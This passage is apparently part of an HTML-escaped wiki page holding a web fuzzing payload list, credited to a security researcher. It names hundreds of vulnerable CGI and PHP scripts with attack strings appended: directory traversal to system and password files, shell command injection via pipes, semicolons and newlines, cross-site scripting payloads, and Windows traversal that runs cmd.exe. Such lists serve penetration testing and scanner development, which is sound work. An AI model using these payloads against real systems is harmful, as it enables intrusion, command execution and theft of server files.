ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
